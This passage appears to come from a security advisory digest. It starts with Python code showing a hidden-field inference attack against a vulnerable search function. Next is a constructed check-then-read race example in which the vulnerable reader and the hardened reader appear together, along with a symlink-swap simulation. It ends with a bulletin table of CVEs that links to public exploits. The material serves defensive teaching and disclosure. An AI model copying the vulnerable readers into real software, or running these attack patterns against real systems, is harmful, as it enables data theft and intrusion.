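    candidate values for a hidden field and return the one that makes the
    target reappear in the PII-free result set."""
    for candidate in candidates:
        hits = search_members(candidate, can_see_pii=False, vulnerable=True)
        if any(hit["first_name"] == target_first_name for hit in hits):
            return candidate
    return None
```

The fix is the one the hardened branch shows: derive the searchable column list from the same visibility check that filters the output, so the SQL never consults a field the caller cannot see.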
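
The OpenClaw entry above (CVE-2026-43529) is a check-then-read race: the boundary check and the later read look at the same path, but not necessarily the same file. The following is an added example, not OpenClaw code, showing that pattern beside a reader that pins the identity of the object it actually reads. The workspace layout, the file names and the deterministic "attacker" hook that stands in for the concurrent swap are constructed here; the code assumes a POSIX system (O_NOFOLLOW, symlinks).

```python
import os
import stat
import tempfile
from typing import Callable, Optional

# Added example, not OpenClaw code. `between` is a constructed hook that runs
# inside the race window so the swap happens deterministically.


def inside_workspace(path: str, workspace: str) -> bool:
    real, ws = os.path.realpath(path), os.path.realpath(workspace)
    return os.path.commonpath([real, ws]) == ws


def read_after_path_check(path: str, workspace: str,
                          between: Callable[[], None]) -> Optional[bytes]:
    """Vulnerable pattern: boundary check on the path, then a separate open()
    of that path. Whatever the path points to at open() time gets read."""
    if not inside_workspace(path, workspace):
        return None
    between()                       # race window: the file can be swapped here
    with open(path, "rb") as f:
        return f.read()


def read_with_identity_check(path: str, workspace: str,
                             between: Callable[[], None]) -> Optional[bytes]:
    """Hardened: record the validated file's identity, open without following
    a symlink at the leaf, and fstat() the handle that is read. Any change of
    identity between check and use is rejected."""
    if not inside_workspace(path, workspace):
        return None
    checked = os.stat(path)
    between()
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:                 # e.g. ELOOP: the leaf became a symlink
        return None
    try:
        opened = os.fstat(fd)
        if not stat.S_ISREG(opened.st_mode):
            return None
        if (opened.st_dev, opened.st_ino) != (checked.st_dev, checked.st_ino):
            return None             # not the object that passed validation
        return os.read(fd, opened.st_size)
    finally:
        os.close(fd)


def simulate(hardened: bool, attack: bool = True) -> Optional[bytes]:
    """Constructed scenario: a script inside the workspace and a secret outside
    it; with attack=True the script is swapped for a symlink to the secret
    inside the race window."""
    with tempfile.TemporaryDirectory() as root:
        workspace = os.path.join(root, "ws")
        os.mkdir(workspace)
        script = os.path.join(workspace, "run.sh")
        secret = os.path.join(root, "secret.txt")
        with open(script, "wb") as f:
            f.write(b"echo hello\n")
        with open(secret, "wb") as f:
            f.write(b"SECRET\n")

        def swap() -> None:
            os.remove(script)
            os.symlink(secret, script)

        reader = read_with_identity_check if hardened else read_after_path_check
        return reader(script, workspace, swap if attack else (lambda: None))
```

The identity comparison is what closes the gap the advisory describes: the validator and the reader now agree on which inode they are talking about, rather than on a path string that the attacker controls in between.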
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| CHORNY--Apache::Session | Apache::Session versions through 1.94 for Perl re-creates deleted sessions. The session stores Apache::Session::Store::File and Apache::Session::Store::DB_File will create a session that does not exist. This can lead to sessions being revived, potentially with data that was to be deleted. | 2026-05-08 | not yet calculated | CVE-2013-10075 | https://rt.cpan.org/Public/Bug/Display.html?id=83525 |
| www[.]thruk[.]org--Thruk Monitoring | In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface. | 2026-05-08 | not yet calculated | CVE-2022-23961 | https://herolab.usd.de/security-advisories/ https://herolab.usd.de/security-advisories/usd-2021-0034/ |
| www[.]avast[.]com--Avast/AVG Windows Anti Rootkit driver | The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xc4a3. | 2026-05-08 | not yet calculated | CVE-2022-26522 | https://www.avast.com/bug-bounty https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ |
| www[.]avast[.]com--Avast/AVG Windows Anti Rootkit driver | The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xbb94. | 2026-05-08 | not yet calculated | CVE-2022-26523 | https://www.avast.com/bug-bounty https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ |
| www[.]nokia[.]com--Nokia Broadcast Message Center (BMC) | Nokia Broadcast Message Center (BMC) before 13.1 allows an unauthenticated remote attacker to do OS command injection as root via shell metacharacters in the Log Scanner Search Pattern field. | 2026-05-08 | not yet calculated | CVE-2022-45899 | https://nokia.com https://www.exploit-db.com/exploits/51896 |
| n/a--Alkacon OpenCms | A Cross Site Scripting vulnerability in Alkacon OpenCms before 10.5.1 exists via cmis-online/type. | 2026-05-08 | not yet calculated | CVE-2023-42343 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | Alkacon OpenCms before 10.5.1 allows remote unauthenticated attackers to obtain sensitive information via a cmis-online/query XXE attack on a Chemistry servlet. | 2026-05-08 | not yet calculated | CVE-2023-42344 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp. | 2026-05-08 | not yet calculated | CVE-2023-42345 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| n/a--Alkacon OpenCms | Alkacon OpenCms before 16 allows XXE when the <!DOCTYPE> refers to an external host. | 2026-05-08 | not yet calculated | CVE-2023-42346 | https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ |
| www[.]gl-inet[.]com--GL.iNet devices v4.x | Certain GL.iNet devices with 4.x firmware allow authentication bypass (resulting in administrative control of the device) via a username that is both a valid SQL statement and a valid regular expression. For example, this affects version 4.3.7 on the GL-MT3000, GL-AR300M, GL-B1300, GL-AX1800, GL-AR750S, GL-MT2500, GL-AXT1800, GL-X3000 and GL-SFT1200. | 2026-05-08 | not yet calculated | CVE-2023-46453 | https://www.exploit-db.com/exploits/51865 |
| n/a--Prusa PrusaSlicer v2.6.1 | In libslic3r/GCode/PostProcessor.cpp in Prusa PrusaSlicer through 2.6.1, a crafted 3mf project file can execute arbitrary code on a host where the project is sliced and G-code exported. | 2026-05-08 | not yet calculated | CVE-2023-47268 | https://help.prusa3d.com/article/post-processing-scripts_283913 https://www.prusa3d.com/page/prusaslicer_424/ https://slic3r.org/download/ https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/local-exploits/39547.txt |
| mikrotik[.]com--RouterOS v6.40.5 to 6.49.10 | MikroTik RouterOS (x86) 6.40.5 through 6.49.10 (fixed in 7) allows a remote attacker to cause a denial of service (device crash) via crafted packet data to the SMB service on TCP port 445. | 2026-05-08 | not yet calculated | CVE-2024-27686 | https://github.com/ice-wzl/RouterOS-SMB-DOS-POC https://www.exploit-db.com/exploits/51931 |
| n/a--Atlona AT-OME-MS42 Matrix Switcher v1.1.2 | /cgi-bin/time.cgi in Atlona AT-OME-MS42 Matrix Switcher 1.1.2 allows remote authenticated users to execute arbitrary commands as root via a POST request that carries a serverName parameter. | 2026-05-08 | not yet calculated | CVE-2024-30167 | https://exchange.xforce.ibmcloud.com/vulnerabilities/285733 |
| n/a--PMS (Prison Management System) PHP v1.0 | Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page. | 2026-05-08 | not yet calculated | CVE-2024-33288 | https://www.sourcecodester.com/sql/17287/prison-management-system.html https://www.exploit-db.com/exploits/52017 |
| n/a--SOPlanning v1.52.00 | SOPlanning 1.52.00 is vulnerable to SQL Injection by an authenticated user via projets.php with statut[]. | 2026-05-08 | not yet calculated | CVE-2024-33722 | https://github.com/fuzzlove/soplanning-1.52-exploits |
| n/a--SOPlanning v1.52.00 | SOPlanning 1.52.00 is vulnerable to Cross Site Scripting (XSS) via the groupe_id parameter to process/groupe_save.php. | 2026-05-08 | not yet calculated | CVE-2024-33724 | https://github.com/fuzzlove/soplanning-1.52-exploits |
| n/a--BYOB (Build Your Own Botnet) 2.0 | A Command Injection issue in the payload build page in BYOB (Build Your Own Botnet) 2.0 allows attackers to execute arbitrary commands on the server via a crafted build parameter. This occurs in freeze in core/generators.py. | 2026-05-08 | not yet calculated | CVE-2024-45257 | https://github.com/malwaredllc/byob https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/ https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/byob_unauth_rce.rb |
| n/a--yeti-platform | A SSTI (server side template injection) vulnerability in the custom template export function in yeti-platform yeti before 2.1.12 allows attackers to execute code on the application server. | 2026-05-08 | not yet calculated | CVE-2024-46507 | https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ |
| n/a--yeti-platform | yeti-platform yeti before 2.1.12 allows attackers to generate valid JWT tokens if the default signing secret is not changed (that is, if YETI_AUTH_SECRET_KEY has not been set to a value other than SECRET). | 2026-05-08 | not yet calculated | CVE-2024-46508 | https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ |
| n/a--LibreNMS | LibreNMS before 24.10.0 allows a remote attacker to execute arbitrary code via OS command injection involving AboutController.php's index(), SettingsController.php's update(), and PollDevice.php's initRrdDirectory(). | 2026-05-08 | not yet calculated | CVE-2024-51092 | https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb https://github.com/librenms/librenms/security/advisories/GHSA-x645-6pf9-xwxw |
| bitcoincore[.]org--Bitcoin Core v28.x | Bitcoin Core through 28.x has a security issue, the details of which are not disclosed. The earliest affected version is 0.14. | 2026-05-05 | not yet calculated | CVE-2024-52911 | https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures https://bitcoincore.org https://bitcoincore.org/en/2026/05/05/disclose-cve-2024-52911/ |
| linqpad[.]net--LINQPad Pro | LINQPad Pro edition before 5.52.01 is vulnerable to unsafe deserialization in LINQPad.AutoRefManager::PopulateFromCache(), leading to code execution. | 2026-05-08 | not yet calculated | CVE-2024-53326 | https://www.linqpad.net/ https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad |
| 3onedata--GW1101-1D(RS-485)-TB-P | 3onedata modbus gateway device model GW1101-1D(RS-485)-TB-P (hardware version V2.2.0) allows authenticated users to execute arbitrary shell commands in the context of the root user by providing a payload in the "IP address" field of the diagnosis test tools. This issue has been resolved in firmware version 3.0.59B2024080600R4353. | 2026-05-04 | not yet calculated | CVE-2025-13605 | https://cert.pl/en/posts/2026/05/CVE-2025-13605 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the PDO Firebird driver improperly handles NUL bytes when preparing SQL queries. During token-by-token query construction, a string token containing a NUL byte is copied via strncat(), which stops at the NUL byte, dropping the closing quote and causing subsequent SQL tokens to be interpreted as part of the string. This allows SQL injection when attacker-controlled values are quoted via PDO::quote() and embedded in SQL statements. | 2026-05-10 | not yet calculated | CVE-2025-14179 | https://github.com/php/php-src/security/advisories/GHSA-w476-322c-wpvm |
| HCLSoftware--BigFix WebUI | An improper authorization vulnerability in HCL BigFix WebUI allows an authenticated user without Master Operator privileges to access internal data (site names, versions, and configuration variables) and bypass privilege requirements via unprotected endpoints lacking adequate security headers. | 2026-05-09 | not yet calculated | CVE-2025-15633 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130587 |
| HCLSoftware--BigFix WebUI | A missing authorization vulnerability in HCL BigFix WebUI allows an authenticated user without proper permissions to view sensitive environmental information via direct URL access to the unauthorized page. | 2026-05-09 | not yet calculated | CVE-2025-15634 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130587 |
| ispconfig[.]com--ISPConfig 3.3.0 | ISPConfig 3.3.0 is vulnerable to Cross Site Scripting (XSS) via the system status webpage. | 2026-05-05 | not yet calculated | CVE-2025-52206 | http://ispconfig.com https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/ |
| n/a--AstrBot 3.5.15 | AstrBotDevs AstrBot 3.5.15 has Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hardcoded private key used to sign a JWT. | 2026-05-08 | not yet calculated | CVE-2025-55449 | https://github.com/AstrBotDevs/AstrBot https://github.com/Marven11/CVE-2025-55449-AstrBot-RCE |
| jupyter-server--jupyter_server | Jupyter Server is the backend for Jupyter web applications. In jupyter_server versions through 2.17.0, the next query parameter in the login flow is insufficiently validated in `LoginFormHandler._redirect_safe()`, which allows redirects to arbitrary external domains via values such as `///example.com`. An attacker can use a crafted login URL to redirect users to a malicious site and facilitate phishing attacks. This issue is fixed in version 2.18.0. | 2026-05-05 | not yet calculated | CVE-2025-61669 | https://github.com/jupyter-server/jupyter_server/security/advisories/GHSA-qh7q-6qm3-653w |
| www[.]npmjs[.]com--NPM Package Parse-ini v1.0.6 | npm package parse-ini v1.0.6 is vulnerable to Prototype Pollution in index.js(). | 2026-05-07 | not yet calculated | CVE-2025-63703 | https://www.npmjs.com/package/parse-ini?activeTab=code https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3 |
| www[.]npmjs[.]com--NPM Package Parse-string | NPM package query-parser-string 1.0.0 is vulnerable to Prototype Pollution. The package does not properly sanitize user supplied query parameters and merges them into the newly created object. | 2026-05-07 | not yet calculated | CVE-2025-63704 | https://www.npmjs.com/package/query-string-parser?activeTab=readme https://github.com/victorteokw/query-string-parser/issues/3 https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b |
| www[.]npmjs[.]com--NPM Package Node v1.0.15 | NPM package node-ts-ocr 1.0.15 is vulnerable to OS Command Injection via the invokeImageOcr function in src/index.js. | 2026-05-07 | not yet calculated | CVE-2025-63705 | https://www.npmjs.com/package/node-ts-ocr https://gist.github.com/6en6ar/a2ac44da0f4e580190be3e66cfbb9a4a |
| www[.]npmjs[.]com--NPM Package npn v1.0.1 | NPM package next-npm-version 1.0.1 is vulnerable to Command Injection. | 2026-05-07 | not yet calculated | CVE-2025-63706 | https://github.com/afeiship/next-npm-version/issues/1 https://www.npmjs.com/package/@jswork/next-npm-version https://gist.github.com/6en6ar/607368f1fc8fe429f03c6e0d9486ba72 |
| n/a--youtubeRegex | Regex Denial of Service in youtube-regex npm package through version 1.0.5. | 2026-05-07 | not yet calculated | CVE-2025-65122 | https://github.com/regexhq/youtube-regex/issues/14 https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has an improper authorization logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and has access to specific APIs can list backups from any account in the environment. This vulnerability does not allow them to see the contents of the backup. Users are recommended to upgrade to version 4.22.0.1, which fixes the issue. | 2026-05-08 | not yet calculated | CVE-2025-66170 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and who has access to specific APIs, can create new VMs using backups of any other user of the environment. Backup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2025-66171 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Apache Software Foundation--Apache CloudStack | The CloudStack Backup plugin has improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and who has access to specific APIs, can restore a volume from any other user's backups and attach the volume to their own VMs. Backup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue. | 2026-05-08 | not yet calculated | CVE-2025-66172 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| www[.]Samsung[.]com--Samsung Mobile Processor | An issue was discovered in MM in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, W920, W930, W1000, Modem 5123, and Modem 5300. Incorrect handling of 5G NR NAS registration accept messages leads to a Denial of Service. | 2026-05-05 | not yet calculated | CVE-2025-66369 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-66369/ |
| n/a--Sidekiq-cron | Sidekiq-cron through 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (XSS) vulnerability via a crafted URL being rendered from cron.erb. | 2026-05-07 | not yet calculated | CVE-2025-67202 | https://github.com/sidekiq-cron/sidekiq-cron/issues/569 https://github.com/sidekiq-cron/sidekiq-cron/releases/tag/v2.4.0 |
| Dolibarr--dolibarr | Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Versions 22.0.2 and earlier contain an authenticated remote code execution vulnerability in the user extrafields functionality. User-controlled input from the "computed value" field is passed to PHP's `eval()` function without adequate sanitization, allowing authenticated administrators to execute arbitrary PHP code on the server. As of the time of publication, no patched versions are available. | 2026-05-08 | not yet calculated | CVE-2025-67486 | https://medium.com/@abduxalilovjavohir/dolibarr-erp-authenticated-remote-code-execution-via-eval-injection-in-user-extrafields-dfc305d0118e https://github.com/Dolibarr/dolibarr/blob/22.0.2/htdocs/core/lib/functions.lib.php |
| n/a--IKUS Rdiffweb | IKUS Rdiffweb before 2.10.5 has an improper authorization flaw that allows an attacker with any valid or stolen access token to act as other users. The API does not enforce binding between the authenticated subject and the targeted user/tenant, so crafted requests can read or modify other users' data and, in some cases, perform privileged actions. This issue may enable cross-tenant access. Fixed in version 2.10.6. | 2026-05-04 | not yet calculated | CVE-2025-67796 | https://gitlab.com/ikus-soft/rdiffweb https://gitlab.com/ikus-soft/rdiffweb#2106-2025-10-02 |
| www[.]bitrix24[.]com--bitrix24 | Bitrix24 through 25.100.300 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website. | 2026-05-08 | not yet calculated | CVE-2025-67886 | https://www.bitrix24.com/self-hosted/ https://seclists.org/fulldisclosure/2025/Dec/21 https://karmainsecurity.com/pocs/CVE-2025-67886.php https://dev.1c-bitrix.ru/learning/course/?COURSE_ID=43&LESSON_ID=3055 https://dev.1c-bitrix.ru/api_help/translate/index.php |
| www[.]bitrix24[.]com--bitrix24 | 1C-Bitrix through 25.100.500 allows Remote Code Execution because an actor with SOURCE/WRITE permissions for the Translate Module can upload and execute code by sending a PHP file and a .htaccess file. NOTE: this is disputed by the Supplier because this is intended behavior for the high-privileged users who can upload new translated pages to the website. | 2026-05-08 | not yet calculated | CVE-2025-67887 | https://www.1c-bitrix.ru/support/index.php https://dev.1c-bitrix.ru/learning/course/?COURSE_ID=43&LESSON_ID=3055 https://dev.1c-bitrix.ru/api_help/translate/index.php https://seclists.org/fulldisclosure/2025/Dec/22 https://karmainsecurity.com/pocs/CVE-2025-67887.php |
| wiki[.]centos-webpanel[.]com—Control Web Panel | An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present. | 2026-05-08 | not yet calculated | CVE-2025-67888 | https://wiki.centos-webpanel.com/cwp-security-instructions https://karmainsecurity.com/KIS-2025-09 |
| n/a--RayVentory Scan Engine | RayVentory Scan Engine through 12.6 Update 8 allows attackers to gain privileges if they control the value of the PATH environment variable. NOTE: this is disputed because the ability of an attacker to control the environment is a site-specific misconfiguration. | 2026-05-08 | not yet calculated | CVE-2025-69599 | https://support.raynet.de/hc/en-us/articles/19518792826132-RVY200865-RayVentory-12-6 https://github.com/Wise-Security/CVE-2025-69599 |
| n/a--Netgate pfSense CE | Netgate pfSense CE 2.7.2 allows code execution by using the module installer with a backup file with a serialized PHP object containing the post_reboot_commands property. NOTE: the Supplier disputes this because this installer is only available to admins and they are intentionally allowed to execute PHP code. | 2026-05-08 | not yet calculated | CVE-2025-69690 | https://www.linkedin.com/in/nelson-adhepeau/ https://seclists.org/fulldisclosure/2026/Feb/16 |
| n/a--Netgate pfSense CE | Netgate pfSense CE 2.8.0 allows code execution in the XMLRPC API via pfsense.exec_php. NOTE: the Supplier disputes this because the API call is only available to admins and they are intentionally allowed to execute PHP code. | 2026-05-08 | not yet calculated | CVE-2025-69691 | https://www.linkedin.com/in/nelson-adhepeau/ https://seclists.org/fulldisclosure/2026/Feb/16 |
| Assimp[.]com--Assimp v6.0.2 | A Buffer Overflow vulnerability exists in Assimp versions up to 6.0.2 in the FBX Importer. The vulnerability occurs in aiMaterial::AddBinaryProperty, where a property key string from a crafted FBX file is copied into a fixed-size heap buffer using strcpy() without runtime length validation. | 2026-05-04 | not yet calculated | CVE-2025-70067 | http://assimp.com https://github.com/assimp/assimp https://gist.github.com/GunP4ng/b6653184a4c5c3e608e6368227397505 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v6.0.2 allows a remote attacker to cause a denial of service via the FBXConverter.cpp and ConvertMeshMultiMaterial() method. | 2026-05-04 | not yet calculated | CVE-2025-70069 | http://assimp.com https://gist.github.com/GunP4ng/9080ae7f0470c889a59cc3bfca445223 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v6.0.2 allows a remote attacker to cause a denial of service via FBXMeshGeometry.cpp, MeshGeometry::MeshGeometry(). | 2026-05-04 | not yet calculated | CVE-2025-70070 | http://assimp.com https://gist.github.com/GunP4ng/a2118ba977b10074a4477322afa7b763 |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v6.0.2 allows a remote attacker to cause a denial of service via FBXParser.cpp, ParseVectorDataArray(). | 2026-05-04 | not yet calculated | CVE-2025-70071 | http://assimp.com https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea |
| Assimp[.]com--Assimp v6.0.2 | An issue in Assimp v6.0.2 allows a remote attacker to cause a denial of service via the FBXConverter.cpp, FBXConverter::ConvertMeshMultiMaterial() components. | 2026-05-04 | not yet calculated | CVE-2025-70072 | http://assimp.com https://gist.github.com/GunP4ng/cdaf0cb89dc6f1d09a9e88fa1135894e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: ensure sb->s_fs_info is always cleaned up When hfsplus was converted to the new mount api a bug was introduced by changing the allocation pattern of sb->s_fs_info. If setup_bdev_super() fails after a new superblock has been allocated by sget_fc(), but before hfsplus_fill_super() takes ownership of the filesystem-specific s_fs_info data it was leaked. Fix this by freeing sb->s_fs_info in hfsplus_kill_super(). | 2026-05-06 | not yet calculated | CVE-2025-71271 | https://git.kernel.org/stable/c/0bcfebb83b5460d5be4e5c9dfb19cdaf3d4cb1db https://git.kernel.org/stable/c/1e38d32bb04d85a2c81204a85a34878a497128c8 https://git.kernel.org/stable/c/126fb0ce99431126b44a6c360192668c818f641f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: core: fix resource leak in most_register_interface error paths The function most_register_interface() did not correctly release resources if it failed early (before registering the device). In these cases, it returned an error code immediately, leaking the memory allocated for the interface. Fix this by initializing the device early via device_initialize() and calling put_device() on all error paths. The most_register_interface() is expected to call put_device() on error which frees the resources allocated in the caller. The put_device() either calls release_mdev() or dim2_release(), depending on the caller. Switch to using device_add() instead of device_register() to handle the split initialization. | 2026-05-06 | not yet calculated | CVE-2025-71272 | https://git.kernel.org/stable/c/a49028a796d7b94f8e3ab9bd34b18f36be235459 https://git.kernel.org/stable/c/af0b99b2214a10554adb5b868240d23af6e64e71 https://git.kernel.org/stable/c/2f483f3817fb0e4209ac5de928778b1da0cc8574 https://git.kernel.org/stable/c/1f4c9d8a1021281750c6cda126d6f8a40cc24e71 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band() Simplify the code by using device managed memory allocations. This also fixes a memory leak in rtw_register_hw(). The supported bands were not freed in the error path. Copied from commit 145df52a8671 ("wifi: rtw89: Convert rtw89_core_set_supported_band to use devm_*"). | 2026-05-06 | not yet calculated | CVE-2025-71273 | https://git.kernel.org/stable/c/9b5418070ee8468fac9e8bf641c83d46b85bff30 https://git.kernel.org/stable/c/ad9b80ee310ed734482a2e5da874b67f88ac0ef8 https://git.kernel.org/stable/c/1bd90e0a99fdc8dc5deb3c92bf865e4496b4b311 https://git.kernel.org/stable/c/2ba12401cc1f2d970fa2e7d5b15abde3f5abd40d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rpmsg: core: fix race in driver_override_show() and use core helper The driver_override_show function reads the driver_override string without holding the device_lock. However, the store function modifies and frees the string while holding the device_lock. This creates a race condition where the string can be freed by the store function while being read by the show function, leading to a use-after-free. To fix this, replace the rpmsg_string_attr macro with explicit show and store functions. The new driver_override_store uses the standard driver_set_override helper. Since the introduction of driver_set_override, the comments in include/linux/rpmsg.h have stated that this helper must be used to set or clear driver_override, but the implementation was not updated until now. Because driver_set_override modifies and frees the string while holding the device_lock, the new driver_override_show now correctly holds the device_lock during the read operation to prevent the race. Additionally, since rpmsg_string_attr has only ever been used for driver_override, removing the macro simplifies the code. | 2026-05-06 | not yet calculated | CVE-2025-71274 | https://git.kernel.org/stable/c/392c6b68334aa0e0ae9aba95c0a366bcb0d92f5d https://git.kernel.org/stable/c/d66b8074c555e8abb0ae19eea1c9f3635498bdde https://git.kernel.org/stable/c/47615557447185917afa432b7958f87583c417cb https://git.kernel.org/stable/c/90c8353f471821d7ccd4fe573a2402e056192494 https://git.kernel.org/stable/c/7654e6e3cd6bdee9602f6063b3c670bd556d7e61 https://git.kernel.org/stable/c/2e4a70f3c30910427e5ea848b799066d67b963d5 https://git.kernel.org/stable/c/954557957177c3c13d7c655976665b1170da5e50 https://git.kernel.org/stable/c/42023d4b6d2661a40ee2dcf7e1a3528a35c638ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: Drop the MHI auto_queue feature for IPCR DL channels MHI stack offers the 'auto_queue' feature, which allows the MHI stack to auto queue the buffers for the RX path (DL channel). Though this feature simplifies the client driver design, it introduces race between the client drivers and the MHI stack. For instance, with auto_queue, the 'dl_callback' for the DL channel may get called before the client driver is fully probed. This means, by the time the dl_callback gets called, the client driver's structures might not be initialized, leading to NULL ptr dereference. Currently, the drivers have to workaround this issue by initializing the internal structures before calling mhi_prepare_for_transfer_autoqueue(). But even so, there is a chance that the client driver's internal code path may call the MHI queue APIs before mhi_prepare_for_transfer_autoqueue() is called, leading to similar NULL ptr dereference. This issue has been reported on the Qcom X1E80100 CRD machines affecting boot. So to properly fix all these races, drop the MHI 'auto_queue' feature altogether and let the client driver (QRTR) manage the RX buffers manually. In the QRTR driver, queue the RX buffers based on the ring length during probe and recycle the buffers in 'dl_callback' once they are consumed. This also warrants removing the setting of 'auto_queue' flag from controller drivers. Currently, this 'auto_queue' feature is only enabled for IPCR DL channel. So only the QRTR client driver requires the modification. | 2026-05-06 | not yet calculated | CVE-2025-71285 | https://git.kernel.org/stable/c/7bdff9b9b0c65ac7105416fe3a40686832515e20 https://git.kernel.org/stable/c/8c464e00e0754e016816b1860fa9592dcad80eb2 https://git.kernel.org/stable/c/51731792a25cb312ca94cdccfa139eb46de1b2ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: ipc4-topology: Correct the allocation size for bytes controls The size of the data behind scontrol->ipc_control_data for bytes controls is: [1] sizeof(struct sof_ipc4_control_data) + // kernel only struct [2] sizeof(struct sof_abi_hdr) + payload The max_size specifies the size of [2] and it is coming from topology. Change the function to take this into account and allocate an adequate amount of memory behind scontrol->ipc_control_data. With the change we will allocate [1] amount more memory to be able to hold the full size of data. | 2026-05-06 | not yet calculated | CVE-2025-71286 | https://git.kernel.org/stable/c/59fe643f21b9d59bcbedb0dfbf988ee455c23736 https://git.kernel.org/stable/c/491956b45b5f4933632ea6d8a8bdfdf045ab81e1 https://git.kernel.org/stable/c/a704a1a4394b5877b9adc31b2c3165ad0b541896 https://git.kernel.org/stable/c/1237cd9ff198cb882402572f29569e5247190974 https://git.kernel.org/stable/c/a653820700b81c9e6f05ac23b7969ecec1a18e85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: memory: mtk-smi: fix device leak on larb probe Make sure to drop the reference taken when looking up the SMI device during larb probe on late probe failure (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2025-71287 | https://git.kernel.org/stable/c/04057b86fdac3d4847913a97dc6552c0bff9b85e https://git.kernel.org/stable/c/357e16a7fc9c1fef2ea37dce9bb6b9bcb1d1687d https://git.kernel.org/stable/c/b9eccd59697f7e1cb9a714501d9af826e7f7e073 https://git.kernel.org/stable/c/1f23a48ff2b8ab47e514f7c84a4b1dbf9b848168 https://git.kernel.org/stable/c/f69535b77fa0518ad39870c00dd2995439ed5c34 https://git.kernel.org/stable/c/1288bb394d464975cea18f69940f206e235e0fe7 https://git.kernel.org/stable/c/9dae65913b32d05dbc8ff4b8a6bf04a0e49a8eb6 |
